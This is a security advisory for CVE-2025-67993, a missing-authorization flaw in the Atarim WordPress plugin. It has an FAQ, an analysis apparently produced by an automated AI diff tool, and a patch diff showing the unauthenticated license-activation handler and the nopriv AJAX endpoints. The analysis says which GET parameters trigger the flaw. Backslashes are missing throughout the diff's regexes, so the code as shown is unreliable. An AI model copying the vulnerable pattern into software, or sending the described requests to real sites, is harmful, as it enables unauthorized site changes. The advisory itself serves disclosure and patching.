What is CVE-2025-67993?

CVE-2025-67993 is a medium severity vulnerability in the Atarim Visual Collaboration plugin for WordPress, affecting versions up to and including 4.2.1. It is caused by a missing authorization check in the license activation function, allowing unauthenticated attackers to perform unauthorized actions.

How does the vulnerability work?

The vulnerability allows attackers to send a crafted HTTP GET request with specific parameters to trigger administrative actions without authentication. This includes actions like license activation and user role escalation, which can compromise site integrity.

Who is affected by this vulnerability?

Any WordPress site using the Atarim Visual Collaboration plugin version 4.2.1 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check for vulnerability, log into your WordPress admin panel and navigate to the Plugins section. Look for the Atarim Visual Collaboration plugin and verify its version number; if it is 4.2.1 or earlier, your site is vulnerable.

What steps should I take to fix the vulnerability?

The vulnerability is patched in version 4.2.2 of the Atarim plugin. Administrators should update to this version immediately to ensure that the missing authorization checks are in place.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Atarim plugin until a patch can be applied. Additionally, review user roles and permissions to limit access to sensitive areas of your WordPress site.

What does a CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This suggests that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access and potential data compromise.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an attacker can craft a specific HTTP GET request that exploits the vulnerability. It outlines the required parameters, demonstrating how unauthorized actions can be executed without authentication.

What are the potential consequences of exploitation?

If exploited, an attacker could gain control over the plugin’s license state, escalate user roles, and modify site configurations. This could lead to unauthorized access to sensitive data and disruption of site functionality.

Are there any additional security measures I should consider?

In addition to updating the Atarim plugin, ensure that all plugins and themes are regularly updated, implement strong user authentication practices, and consider using security plugins that monitor for unauthorized changes and access.

How can I stay informed about future vulnerabilities?

Subscribe to security mailing lists or follow platforms like the National Vulnerability Database (NVD) and WordPress security blogs. Regularly review security advisories related to the plugins and themes you use.

What should I do if I suspect my site has been compromised?

If you suspect a compromise, immediately take your site offline, change all passwords, and review user accounts for unauthorized changes. Consult with a security professional to conduct a thorough investigation and remediation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-67993: Atarim <= 4.2.1 – Missing Authorization (atarim-visual-collaboration)

CVE ID CVE-2025-67993

Plugin atarim-visual-collaboration

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 4.2.1

Patched Version 4.2.2

Disclosed February 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67993:
The Atarim WordPress plugin version 4.2.1 and earlier contains a missing authorization vulnerability in its license activation callback handler. This flaw allows unauthenticated attackers to trigger a series of administrative actions, including license activation, user role escalation, and site configuration changes.

Atomic Edge research identifies the root cause in the `new_license_activation()` function within the main plugin file `atarim-visual-collaboration.php`. The function executes on WordPress `init` hook at line 429. The vulnerable code performs no capability checks before processing the `atarim_response` GET parameter. The function directly updates multiple WordPress options via `update_option()` calls, modifies user metadata with `update_user_meta()`, and triggers synchronization actions without verifying the request originates from an authenticated administrator.

The exploitation method involves sending a crafted HTTP GET request to any page on the WordPress site with the `atarim_response` parameter and related license data parameters. An attacker can construct a request containing base64-encoded values for `license_key`, `expires`, `prod_id`, `payment_id`, `checksum`, and `wpf_site_id`. When processed, the function decodes these values and stores them as site options. The attack vector does not require authentication, CSRF tokens, or nonces. The endpoint is accessible via the frontend due to the `init` hook execution on all page loads.

The patch in version 4.2.2 adds comprehensive authorization checks before processing license activation. The updated `new_license_activation()` function now validates that the request originates from an authenticated administrator with `manage_options` capability. It verifies the user is logged in, is in the admin area, and checks a nonce parameter `atarim_state` created during license activation link generation. The patch also decodes and validates a base64-encoded `page` parameter to ensure the request targets the correct admin page. Unauthorized requests are redirected to the homepage.

Successful exploitation grants the attacker control over the plugin’s license state and configuration. The vulnerability escalates the current user’s role to ‘advisor’ via `update_user_meta()`. It triggers the `wpf_initial_sync` action and `syncUsers()` function, potentially exposing user data. Attackers can manipulate license validation, disrupt plugin functionality, or establish persistence by controlling license-related options. The CVSS 5.3 score reflects medium severity due to the authentication bypass and impact on site integrity.

Differential between vulnerable and patched code

Code Diff

--- a/atarim-visual-collaboration/atarim-visual-collaboration.php
+++ b/atarim-visual-collaboration/atarim-visual-collaboration.php
@@ -2,7 +2,7 @@
 /*
  * Plugin Name: Atarim: Visual Website Collaboration, Feedback & Workflow Management
  * Description: Atarim Visual Collaboration makes it easy and efficient to collaborate on websites with your clients, internal team, contractors…anyone! It’s used by nearly 10,000 agencies and freelancers worldwide on over 120,000 websites.
- * Version: 4.2.1
+ * Version: 4.2.2
  * Requires at least: 5.0
  * Require PHP: 7.4
  * Author: Atarim
@@ -29,7 +29,7 @@
     define( 'WPF_PLUGIN_URL', plugin_dir_url( __FILE__ ) );
 }
 if ( ! defined( 'WPF_VERSION' ) ) {
-    define( 'WPF_VERSION', '4.2.1' );
+    define( 'WPF_VERSION', '4.2.2' );
 }

 define( 'SCOPER_ALL_UPLOADS_EDITABLE ', true );
@@ -85,107 +85,94 @@
         return;
     }

-    // Decode what wp.org sent.
+    // 1) Get raw string from wp.org and normalise.
     $raw = html_entity_decode(
         $response->upgrade_notice,
         ENT_QUOTES,
         get_bloginfo( 'charset' )
     );

-    // Normalise newlines.
-    $raw = str_replace( array( "rn", "r" ), "n", $raw );
+    // If wp.org wrapped it in <p> / <br>, flatten to text first.
+    // Replace <br> with spaces, strip remaining tags.
+    $raw = preg_replace( '#<brs*/?>#i', ' ', $raw );
+    $raw = wp_strip_all_tags( $raw, true );

-    // If wp.org wrapped it in <p>, flatten that to plain text with newlines.
-    if ( strpos( $raw, '<p' ) !== false ) {
-        $raw = preg_replace( '#</p>s*<p>#i', "nn", $raw ); // paragraph break → blank line
-        $raw = preg_replace( '#</?p[^>]*>#i', '', $raw );      // remove remaining <p> tags
-    }
+    // Collapse multiple whitespace to single spaces.
+    $raw = trim( preg_replace( "/s+/", " ", $raw ) );

-    $raw = trim( $raw );
     if ( $raw === '' ) {
         return;
     }

-    // Find blocks of the form: **Title:** body ... (until next ** or end)
-    // Each match gives you one "notice box".
-    $pattern = '/**(.+?)**(.*?)(?=n**|z)/s';
-    if ( ! preg_match_all( $pattern, $raw, $matches, PREG_SET_ORDER ) ) {
-        // Fallback: no ** sections, treat whole thing as one block.
-        $matches = array(
-            array( 0, '', $raw ),
-        );
+    $title      = '';
+    $body       = '';
+    $line_break = false;
+
+    // RULE 1: Exclamation "Title!" → bold + line break.
+    $posBang = strpos( $raw, '!' );
+    if ( $posBang !== false ) {
+        $title      = trim( substr( $raw, 0, $posBang + 1 ) ); // include !
+        $body       = trim( substr( $raw, $posBang + 1 ) );
+        $line_break = true;
+    } else {
+        // RULE 2: Hyphen "Title - body" → bold, no line break.
+        $posDash = strpos( $raw, '-' );
+        if ( $posDash !== false ) {
+            $title      = trim( substr( $raw, 0, $posDash ) );
+            $body       = trim( substr( $raw, $posDash + 1 ) );
+            $line_break = false;
+        } else {
+            // RULE 3: No markers → no title, whole thing is body.
+            $body = $raw;
+        }
     }

-    foreach ( $matches as $match ) {
-
-        $title = isset( $match[1] ) ? trim( $match[1] ) : '';
-        $body  = isset( $match[2] ) ? trim( $match[2] ) : '';
+    // 2) Build HTML safely.

-        // Strip trailing colon from title if present.
-        $title = trim( $title, " tnrx0B:" );
-
-        // Convert markdown-style links in title/body if present: [text](url)
-        if ( strpos( $title . $body, '[' ) !== false && strpos( $title . $body, '](' ) !== false ) {
-            $replace_links = function( $text ) {
-                return preg_replace(
-                    '/[(.+?)]((https?://[^s)]+))/',
-                    '<a href="$2" target="_blank" rel="noopener noreferrer">$1</a>',
-                    $text
-                );
-            };
-            $title = $replace_links( $title );
-            $body  = $replace_links( $body );
-        }
-
-        // Convert any remaining newlines in body to <br>.
-        if ( $body !== '' ) {
-            $body = nl2br( $body );
-        }
-
-        // Box styling: full-width-ish, default WP-ish yellow.
-        // Using <span> (phrasing content) with display:block so we stay valid inside core's <p>.
-        $style  = 'display:block;';
-        $style .= 'margin-top:8px;';
-        $style .= 'padding:10px 14px;';
-        $style .= 'background:#fff8e5;';
-        $style .= 'border-left:4px solid #d63638;';
-        $style .= 'border-radius:4px;';
-        $style .= 'line-height:1.5;';
-        $style .= 'box-sizing:border-box;';
-
-        echo '<span class="atarim-upgrade-notice" style="' . esc_attr( $style ) . '">';
-
-        if ( $title !== '' ) {
-            // Allow links inside the title, nothing else fancy.
-            echo '<strong>' . wp_kses(
-                    $title,
-                    array(
-                        'a' => array(
-                            'href'   => array(),
-                            'target' => array(),
-                            'rel'    => array(),
-                        ),
-                    )
-                ) . ':</strong>';
-        }
-
-        if ( $body !== '' ) {
-            echo '<br />';
-            echo wp_kses(
-                $body,
-                array(
-                    'br' => array(),
-                    'a'  => array(
-                        'href'   => array(),
-                        'target' => array(),
-                        'rel'    => array(),
-                    ),
-                )
-            );
-        }
+    // Auto-link bare URLs in body (https://...).
+    $body_html = esc_html( $body );
+    if ( $body_html !== '' ) {
+        $body_html = preg_replace(
+            '~(https?://[^s<]+)~',
+            '<a href="$1" target="_blank" rel="noopener noreferrer">$1</a>',
+            $body_html
+        );
+    }

-        echo '</span>';
+    // Box styling (full-width WP-style).
+    $style  = 'display:block;';
+    $style .= 'margin-top:8px;';
+    $style .= 'padding:10px 14px;';
+    $style .= 'background:#fff8e5;';
+    $style .= 'border-left:4px solid #d63638;';
+    $style .= 'border-radius:4px;';
+    $style .= 'line-height:1.5;';
+    $style .= 'box-sizing:border-box;';
+
+    echo '<span class="atarim-upgrade-notice" style="' . esc_attr( $style ) . '">';
+
+    // Title part
+    if ( $title !== '' ) {
+        echo '<strong>' . esc_html( $title ) . '</strong>';
+        echo $line_break ? '<br />' : ' ';
+    }
+
+    // Body part
+    if ( $body_html !== '' ) {
+        // Limit allowed tags to <a> only (we created those).
+        echo wp_kses(
+            $body_html,
+            array(
+                'a' => array(
+                    'href'   => array(),
+                    'target' => array(),
+                    'rel'    => array(),
+                ),
+            )
+        );
     }
+
+    echo '</span>';
 }

 /*
@@ -443,47 +430,89 @@
 add_action( 'init', 'session_for_invited_user' );

 function new_license_activation() {
-
-    /*New license activation*/
-    if ( isset( $_GET['atarim_response'] ) ) {
-        global $current_user;
-        $user_id = $current_user->ID;
-
-        // remove the %3D(it's 7 if decoded) from the query string parameter if present
-        if ( strpos( $_GET['atarim_response'], '%3D' ) !== false ) {
-            $atarim_response = substr( $_GET['atarim_response'], -1, 3 );
-        } else {
-            $atarim_response = $_GET['atarim_response'];
-        }
-        update_option( 'wpf_license', base64_decode( sanitize_text_field( $atarim_response ) ) );
-        $wpf_license_key = '';
-        if ( isset( $_GET['license_key'] ) ) {
-            $wpf_license_key = base64_decode( sanitize_text_field( $_GET['license_key'] ) );
-            $wpf_crypt_key = wpf_crypt_key( $wpf_license_key, 'e' );
-            update_option( 'wpf_license_key', $wpf_crypt_key, 'no' );
-        }
-        if ( isset( $_GET['expires'] ) ) {
-            update_option( 'wpf_license_expires', base64_decode( sanitize_text_field( $_GET['expires'] ) ), 'no' );
-        }
-        if ( isset( $_GET['prod_id'] ) ) {
-            update_option( 'wpf_prod_id', base64_decode( sanitize_text_field( $_GET['prod_id'] ) ), 'no' );
-        }
-        if ( isset( $_GET['payment_id'] ) ) {
-            $decr = update_option( 'wpf_decr_key', base64_decode( sanitize_text_field( $_GET['payment_id'] ) ) );
-        }
-        if ( isset( $_GET['checksum'] ) ) {
-            $checksu = update_option( 'wpf_decr_checksum', base64_decode( sanitize_text_field( $_GET['checksum'] ) ), 'no' );
-        }
-        update_option( 'wpf_site_id', base64_decode( sanitize_text_field( $_GET['wpf_site_id'] ) ), 'no' );
-        update_user_meta( $user_id, 'wpf_user_type', 'advisor' );
-        do_action( 'wpf_initial_sync', $wpf_license_key );
-        syncUsers();
-        update_option("wpf_initial_setup_complete", 'yes');
-
-        // redirect user to front side after activation process is complete by Pratap on 21/09/2023.
-        wp_safe_redirect( WPF_HOME_URL );
-        exit();
+    if (! isset( $_GET['atarim_response'])) {
+        return;
     }
+
+    if (
+        ! is_admin() ||
+        ! is_user_logged_in() ||
+        ! current_user_can( 'manage_options' ) ||
+        ! isset( $_GET['page'] )
+    ) {
+        wp_safe_redirect( home_url() );
+        exit;
+    }
+
+    $page_raw = sanitize_text_field( wp_unslash( $_GET['page'] ) );
+    $page_decoded = base64_decode( $page_raw, true );
+
+    if ( false === $page_decoded ) {
+        wp_safe_redirect( home_url() );
+        exit;
+    }
+
+    $parsed = [];
+    parse_str( 'page=' . $page_decoded, $parsed );
+
+    $page_slug    = isset( $parsed['page'] ) ? $parsed['page'] : '';
+    $atarim_state = isset( $parsed['atarim_state'] ) ? $parsed['atarim_state'] : '';
+
+    // Optionally lock to the expected page slug.
+    if ( 'collaboration_page_settings' !== $page_slug ) {
+        wp_safe_redirect( home_url() ); // or WPF_HOME_URL if you prefer
+        exit;
+    }
+
+    // Verify nonce / state.
+    if ( empty( $atarim_state ) || ! wp_verify_nonce( $atarim_state, 'wpf_new_license_activation' ) ) {
+        wp_safe_redirect( home_url() ); // or WPF_HOME_URL if you prefer
+        exit;
+    }
+
+    global $current_user;
+    $user_id = $current_user->ID;
+
+    // remove the %3D(it's 7 if decoded) from the query string parameter if present
+    if ( strpos( $_GET['atarim_response'], '%3D' ) !== false ) {
+        $atarim_response = substr( $_GET['atarim_response'], -1, 3 );
+    } else {
+        $atarim_response = $_GET['atarim_response'];
+    }
+
+    update_option( 'wpf_license', base64_decode( sanitize_text_field( $atarim_response ) ) );
+    $wpf_license_key = '';
+    if ( isset( $_GET['license_key'] ) ) {
+        $wpf_license_key = base64_decode( sanitize_text_field( $_GET['license_key'] ) );
+        $wpf_crypt_key = wpf_crypt_key( $wpf_license_key, 'e' );
+        update_option( 'wpf_license_key', $wpf_crypt_key, 'no' );
+    }
+
+    if ( isset( $_GET['expires'] ) ) {
+        update_option( 'wpf_license_expires', base64_decode( sanitize_text_field( $_GET['expires'] ) ), 'no' );
+    }
+
+    if ( isset( $_GET['prod_id'] ) ) {
+        update_option( 'wpf_prod_id', base64_decode( sanitize_text_field( $_GET['prod_id'] ) ), 'no' );
+    }
+
+    if ( isset( $_GET['payment_id'] ) ) {
+        $decr = update_option( 'wpf_decr_key', base64_decode( sanitize_text_field( $_GET['payment_id'] ) ) );
+    }
+
+    if ( isset( $_GET['checksum'] ) ) {
+        $checksu = update_option( 'wpf_decr_checksum', base64_decode( sanitize_text_field( $_GET['checksum'] ) ), 'no' );
+    }
+
+    update_option( 'wpf_site_id', base64_decode( sanitize_text_field( $_GET['wpf_site_id'] ) ), 'no' );
+    update_user_meta( $user_id, 'wpf_user_type', 'advisor' );
+    do_action( 'wpf_initial_sync', $wpf_license_key );
+    syncUsers();
+    update_option("wpf_initial_setup_complete", 'yes');
+
+    // redirect user to front side after activation process is complete by Pratap on 21/09/2023.
+    wp_safe_redirect( WPF_HOME_URL );
+    exit();
 }
 add_action( 'init', 'new_license_activation' );

--- a/atarim-visual-collaboration/inc/admin/page-settings-permissions.php
+++ b/atarim-visual-collaboration/inc/admin/page-settings-permissions.php
@@ -82,7 +82,12 @@
                                         echo '<div class="wpf_license_deactivate_wrap"><p><span class="wpf_active_license" style="color:#0aaf3a;">' . __( 'License Active', 'atarim-visual-collaboration' ) . '</span></p>';
                                         echo '<input type="submit" class="wpf_deactivate_button" name="wpf_license_deactivate" value="'.__( "Deactivate License", 'atarim-visual-collaboration' ).'"/></div>';
                                     } else {
-                                        $home_url = WPF_APP_SITE_URL . '?activation_callback='.Base64_encode( WPF_SITE_URL ).'&page_redirect=' . Base64_encode( "collaboration_page_settings" ) . '&site_url=' . Base64_encode( WPF_HOME_URL );
+                                        $atarim_state = wp_create_nonce( 'wpf_new_license_activation' );
+                                        $page_redirect = base64_encode('collaboration_page_settings&atarim_state=' . $atarim_state);
+                                        $home_url = WPF_APP_SITE_URL
+                                            . '?activation_callback=' . base64_encode( WPF_SITE_URL )
+                                            . '&page_redirect=' . $page_redirect
+                                            . '&site_url=' . base64_encode( WPF_HOME_URL );
                                         echo '<a href="'.$home_url.'"><button type="button" class="wpf_activate_btn" name="wpf_activate" access="false" id="ber_page4_save"><span class="dashicons dashicons-update"></span>' . __( 'Activate This Website', 'atarim-visual-collaboration' ) . '</button></a>';
                                     }
                                     ?>
--- a/atarim-visual-collaboration/inc/admin/wpf_backend_initial_setup.php
+++ b/atarim-visual-collaboration/inc/admin/wpf_backend_initial_setup.php
@@ -27,8 +27,13 @@
 						?>
 					</p>
 					<input type="hidden" name="action" value="save_wpfeedback_options"/>
-					<?php
-						$google_sup = WPF_APP_SITE_URL . '/google-auth?activation_callback='.Base64_encode( WPF_SITE_URL ).'&page_redirect=' . Base64_encode( "collaboration_page_settings" ) . '&site_url=' . Base64_encode( WPF_HOME_URL );
+					<?php
+                        $atarim_state = wp_create_nonce( 'wpf_new_license_activation' );
+                        $page_redirect = base64_encode('collaboration_page_settings&atarim_state=' . $atarim_state);
+                        $google_sup = WPF_APP_SITE_URL
+                            . '/google-auth?activation_callback=' . base64_encode( WPF_SITE_URL )
+                            . '&page_redirect=' . $page_redirect
+                            . '&site_url=' . base64_encode( WPF_HOME_URL );
 					?>
 					<a href="<?php echo $google_sup; ?>" class="supg-btn">
 						<span>
@@ -64,7 +69,12 @@
 						printf( __( '<p class="wpf_tcpp">By opening an account I agree to the <a href="https://atarim.io/privacy-policy/" target="_blank">privacy policy</a>.</p>', 'atarim-visual-collaboration' ) );
 					?>
 					<?php
-						$home_url = WPF_APP_SITE_URL . '?activation_callback=' . Base64_encode( WPF_SITE_URL ) . '&page_redirect=' . Base64_encode( "collaboration_page_settings" ) . '&site_url=' . Base64_encode( WPF_HOME_URL );
+                        $atarim_state = wp_create_nonce( 'wpf_new_license_activation' );
+                        $page_redirect = base64_encode('collaboration_page_settings&atarim_state=' . $atarim_state);
+                        $home_url = WPF_APP_SITE_URL
+                            . '?activation_callback=' . base64_encode( WPF_SITE_URL )
+                            . '&page_redirect=' . $page_redirect
+                            . '&site_url=' . base64_encode( WPF_HOME_URL );
 						echo '<p class="wpf_has_account" style="width:100%"><a class="wpf_account_link" href="' . $home_url . '">I already have an account (Login)</a></p>';
 					?>
 					<!--End new activation-->
--- a/atarim-visual-collaboration/inc/wpf_ajax_functions.php
+++ b/atarim-visual-collaboration/inc/wpf_ajax_functions.php
@@ -354,7 +354,6 @@
                         }

                         $name           = "<div class='wpf_initials'>" . $author . "</div>";
-                        $image_dwn_icon = "<span id='wpf_push_media' class='wpf_push_media wpf_image_download'>" . get_wpf_push_to_media_icon() . "</span><span id='wpf_image_open' class='wpf_image_open' onclick='wpf_image_open_new_tab(this)'>" . get_wpf_image_open_icon();
                         if ( strpos( $comment['comment_content'], 'wpfeedback-image.s3' ) !== false ) {
                             if ( $comment['comment_type'] == 'image/png' || $comment['comment_type'] == 'image/gif' || $comment['comment_type'] == 'image/jpeg' ) {
                                 $comment_text = '<a href="' . $comment['comment_content'] . '" target=_blank><div class="tag_img" style="width: 275px;height: 183px;"><div class="meassage_area_main"><a href="' . $comment['comment_content'] . '" target="_blank"></a><img src="' . $comment['comment_content'] . '" alt="" style="width: 100%;" class="wpfb_task_screenshot">' . $image_dwn_icon . '</div></div></a>';
@@ -2065,65 +2064,6 @@
 }

 /*
- * This function is used to push the media to the wordpress media library. It is called from Atarim dashboard.
- * URL: DOMAIN/wp-admin/admin-ajax.php?action=app_push_to_media
- *
- * @input string
- * @return String
- */
-if ( ! function_exists( 'app_push_to_media' ) ) {
-    function app_push_to_media() {
-        $valid = wpf_api_request_verification();
-        if( $valid == 1 ) {
-            $input_json = file_get_contents( 'php://input' );
-            $input      = json_decode( $input_json );
-            require_once( ABSPATH . 'wp-admin/includes/media.php' );
-            require_once( ABSPATH . 'wp-admin/includes/file.php' );
-            require_once( ABSPATH . 'wp-admin/includes/image.php' );
-            $save_url   = $input->url;
-            $res        = media_sideload_image( $save_url );
-
-            if ( ! is_wp_error( $res ) ) {
-                $response = 200;
-            } else {
-                $response = 400;
-            }
-        } else {
-            $response = 403;
-        }
-		echo $response;
-		exit;
-    }
-}
-add_action( 'wp_ajax_push_app_push_to_media', 'app_push_to_media' );
-add_action( 'wp_ajax_nopriv_app_push_to_media', 'app_push_to_media' );
-
-/*
- * This function is used to push the media to the wordpress media library. It is called from task popover.
- *
- * @input string
- * @return numeric
- */
-if ( ! function_exists( 'push_to_media' ) ) {
-    function push_to_media() {
-        wpf_security_check();
-        $save_url = sanitize_url( $_POST['media_link'] );
-        require_once( ABSPATH . 'wp-admin/includes/media.php' );
-        require_once( ABSPATH . 'wp-admin/includes/file.php' );
-        require_once( ABSPATH . 'wp-admin/includes/image.php' );
-        $res = media_sideload_image( $save_url );
-        if ( ! is_wp_error( $res ) ) {
-            echo 1;
-        } else {
-            echo 2;
-        }
-        exit;
-    }
-}
-add_action( 'wp_ajax_push_to_media', 'push_to_media' );
-add_action( 'wp_ajax_nopriv_push_to_media', 'push_to_media' );
-
-/*
  * This function is get the milestone of the site
  *
  * @input Array ( $_POST )
--- a/atarim-visual-collaboration/inc/wpf_api.php
+++ b/atarim-visual-collaboration/inc/wpf_api.php
@@ -161,30 +161,6 @@
 add_action( 'wp_ajax_nopriv_wpf_website_details', 'wpf_website_details' );

 /*
- * This function is called by the APP to get the users of the website.
- * URL: DOMAIN/wp-admin/admin-ajax.php?action=wpf_website_users
- *
- * @input NULL
- * @return JSON
- */
-function wpf_website_users() {
-    $valid = wpf_api_request_verification();
-    if ( $valid == 1 ) {
-        $response = wpf_api_func_get_users();
-        // fixed sync of users when user click the "sync" button on the app
-        get_notif_sitedata_filterdata();
-        $response_signature = wpf_generate_response_signature( $response );
-        header( "response-signature: " . $response_signature );
-    } else {
-        $response = 'invalid request';
-    }
-    echo $response;
-    exit;
-}
-add_action( 'wp_ajax_wpf_website_users', 'wpf_website_users' );
-add_action( 'wp_ajax_nopriv_wpf_website_users', 'wpf_website_users' );
-
-/*
  * This function is called from APP when website is requested to resync. This function is also called from the website when the button "Resync the Central Dashboard" button is clicked.
  * URL: DOMAIN/wp-admin/admin-ajax.php?action=wpf_website_resync
  *
@@ -530,11 +506,32 @@
     return $data;
 }

+function wpf_visual_composer_api_permissions( WP_REST_Request $request ) {
+    // Require a logged-in user with admin capabilities.
+    if ( ! is_user_logged_in() ) {
+        return new WP_Error(
+            'rest_forbidden',
+            __( 'Authentication required.', 'atarim-visual-collaboration' ),
+            array( 'status' => rest_authorization_required_code() )
+        );
+    }
+
+    if ( ! current_user_can( 'edit_posts' ) ) {
+        return new WP_Error(
+            'rest_forbidden',
+            __( 'You are not allowed to access this resource.', 'atarim-visual-collaboration' ),
+            array( 'status' => rest_authorization_required_code() )
+        );
+    }
+
+    return true;
+}
+
 add_action( 'rest_api_init', function () {
     register_rest_route( 'atarim/v1', '/db/vc', array(
         'methods' => 'GET',
         'callback' => 'wpf_visual_composer_api',
-        'permission_callback' => '__return_true'
+        'permission_callback' => 'wpf_visual_composer_api_permissions',
     ) );
 } );

--- a/atarim-visual-collaboration/inc/wpf_function.php
+++ b/atarim-visual-collaboration/inc/wpf_function.php
@@ -729,15 +729,6 @@
     }
 }

-/*
- * push to media icon
- */
-if ( ! function_exists( 'get_wpf_push_to_media_icon' ) ) {
-    function get_wpf_push_to_media_icon() {
-        return '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="32pt" height="31pt" viewBox="0 0 32 31" version="1.1"><g id="surface1"><path style=" stroke:none;fill-rule:nonzero;fill:#ffffff;fill-opacity:1;" d="M 16.234375 16.746094 L 13.558594 24.3125 L 13.550781 24.3125 L 11.476562 30.09375 C 11.621094 30.132812 11.761719 30.164062 11.910156 30.203125 C 11.917969 30.203125 11.925781 30.203125 11.933594 30.203125 C 13.222656 30.535156 14.578125 30.71875 15.972656 30.71875 C 16.667969 30.71875 17.34375 30.679688 18.007812 30.574219 C 18.921875 30.464844 19.800781 30.277344 20.660156 30.015625 C 20.871094 29.953125 21.082031 29.878906 21.296875 29.808594 C 21.066406 29.335938 20.578125 28.28125 20.554688 28.234375 Z M 16.234375 16.746094 "/><path style=" stroke:none;fill-rule:nonzero;fill:#ffffff;fill-opacity:1;" d="M 1.6875 9.5625 C 0.871094 11.351562 0.316406 13.550781 0.316406 15.535156 C 0.316406 16.03125 0.339844 16.53125 0.390625 17.019531 C 0.953125 22.652344 4.707031 27.382812 9.867188 29.507812 C 10.078125 29.59375 10.300781 29.683594 10.519531 29.761719 L 2.929688 9.570312 C 2.277344 9.546875 2.152344 9.585938 1.6875 9.5625 Z M 1.6875 9.5625 "/><path style=" stroke:none;fill-rule:nonzero;fill:#ffffff;fill-opacity:1;" d="M 30.210938 9.160156 C 29.859375 8.425781 29.441406 7.722656 28.976562 7.058594 C 28.847656 6.867188 28.699219 6.675781 28.5625 6.488281 C 26.804688 4.210938 24.414062 2.421875 21.628906 1.378906 C 19.882812 0.714844 17.972656 0.351562 15.980469 0.351562 C 11.058594 0.351562 6.660156 2.566406 3.785156 6.019531 C 3.253906 6.652344 2.78125 7.332031 2.355469 8.046875 C 3.515625 8.054688 4.953125 8.054688 5.117188 8.054688 C 6.59375 8.054688 8.871094 7.878906 8.871094 7.878906 C 9.640625 7.832031 9.71875 8.914062 8.960938 9.003906 C 8.960938 9.003906 8.195312 9.089844 7.34375 9.128906 L 12.480469 23.917969 L 15.566406 14.957031 L 13.378906 9.136719 C 12.609375 9.097656 11.898438 9.011719 11.898438 9.011719 C 11.132812 8.972656 11.230469 7.839844 11.980469 7.886719 C 11.980469 7.886719 14.308594 8.0625 15.695312 8.0625 C 17.171875 8.0625 19.453125 7.886719 19.453125 7.886719 C 20.210938 7.839844 20.308594 8.921875 19.539062 9.011719 C 19.539062 9.011719 18.78125 9.097656 17.933594 9.136719 L 23.019531 23.816406 L 24.429688 19.257812 C 25.140625 17.488281 25.5 16.023438 25.5 14.855469 C 25.5 13.171875 24.871094 12 24.332031 11.089844 C 23.621094 9.960938 22.953125 9.011719 22.953125 7.894531 C 22.953125 6.636719 23.933594 5.46875 25.320312 5.46875 C 25.378906 5.46875 25.441406 5.46875 25.5 5.46875 C 27.640625 5.414062 28.339844 7.46875 28.429688 8.867188 C 28.429688 8.867188 28.429688 8.898438 28.429688 8.914062 C 28.464844 9.484375 28.4375 9.902344 28.4375 10.402344 C 28.4375 11.777344 28.167969 13.335938 27.371094 15.289062 L 24.1875 24.210938 L 22.367188 29.40625 C 22.511719 29.34375 22.652344 29.277344 22.796875 29.207031 C 27.425781 27.042969 30.796875 22.722656 31.507812 17.605469 C 31.613281 16.933594 31.664062 16.246094 31.664062 15.550781 C 31.664062 13.265625 31.140625 11.097656 30.210938 9.160156 Z M 30.210938 9.160156 "/></g></svg>';
-    }
-}
-
 if ( ! function_exists( 'wpf_get_current_user_information' ) ) {
     function wpf_get_current_user_information( $author_id = '' ) {
         $response = array();
--- a/atarim-visual-collaboration/inc/wpf_popup_string.php
+++ b/atarim-visual-collaboration/inc/wpf_popup_string.php
@@ -21,7 +21,6 @@
 $wpf_task_text_error_msg     = __( 'A user must be selected to post a comment', 'atarim-visual-collaboration' );
 $wpf_task_note_error_msg     = __( 'Task cannot be created with note', 'atarim-visual-collaboration' );
 $wpf_task_upload_error_msg   = __( 'Please post your comment before performing this action', 'atarim-visual-collaboration' );
-$wpf_push_to_media_error_msg = __( 'The website server didn't respond,  please try again', 'atarim-visual-collaboration' );
 $wpf_upload_invalid_file_msg = __( 'The website server didn't respond to the file upload,  please try again', 'atarim-visual-collaboration' );
 $wpf_resolution              = __( 'Screen Size:', 'atarim-visual-collaboration' );
 $wpf_browser                 = __( 'Browser:', 'atarim-visual-collaboration' );
@@ -49,5 +48,5 @@
 $switch_to_normal            = __( 'Switch to a normal task' , 'atarim-visual-collaboration' );
 $switch_to_internal          = __( 'Switch to an Internal task' , 'atarim-visual-collaboration' );
 $add_note                    = __( 'Create a private message that only team members can see', 'atarim-visual-collaboration' );
-$all_popup_lable             = '<script>var wpf_remap_text="' . addslashes( $wpf_remap_text ) . '", wpf_general_task_option="' . addslashes( $wpf_general_task_option ) . '", wpf_tasks_found="' . addslashes( $wpf_tasks_found ) . '", wpf_bulk_editing_tasks="' . addslashes( $wpf_bulk_editing_tasks ) . '", wpf_remove_login_parameter="' . addslashes( $wpf_remove_login_parameter ) . '", wpf_share_task_link="' . addslashes( $wpf_share_task_link ) . '", wpf_custom_tags="' . addslashes( $wpf_custom_tags ) . '", wpf_additional_information="' . addslashes( $wpf_additional_information ) . '", wpf_priority_low="' . addslashes( $wpf_priority_low ) . '", wpf_priority_medium= "' . addslashes( $wpf_priority_medium ) . '", wpf_priority_high="' . addslashes( $wpf_priority_high ) . '", wpf_priority_critical="' . addslashes( $wpf_priority_critical ) . '", wpf_status_open_task="' . addslashes( $wpf_status_open_task ) . '", wpf_status_in_progress= "' . addslashes( $wpf_status_in_progress ) . '", wpf_status_pending_review="' . addslashes( $wpf_status_pending_review ) . '", wpf_status_complete="' . addslashes( $wpf_status_complete ) . '", wpf_complete_task="' . addslashes( $wpf_complete_task ) . '", wpf_completed_task="' . addslashes( $wpf_completed_task ) . '", wpf_screenshot_view = "' . addslashes( $wpf_screenshot_view ) . '", wpf_comment_box_placeholder="' . addslashes( $wpf_comment_box_placeholder ) . '", wpf_create_task="' . addslashes( $wpf_create_task ) . '", wpf_add_comment_btn="' . addslashes( $wpf_add_comment_btn ) . '", wpf_mark_internal_btn="' . addslashes( $wpf_mark_internal_btn ) . '", wpf_task_text_error_msg="' . addslashes( $wpf_task_text_error_msg ) . '", wpf_task_note_error_msg="' . addslashes( $wpf_task_note_error_msg ) . '" , wpf_upload_invalid_file_msg="' . addslashes( $wpf_upload_invalid_file_msg ) . 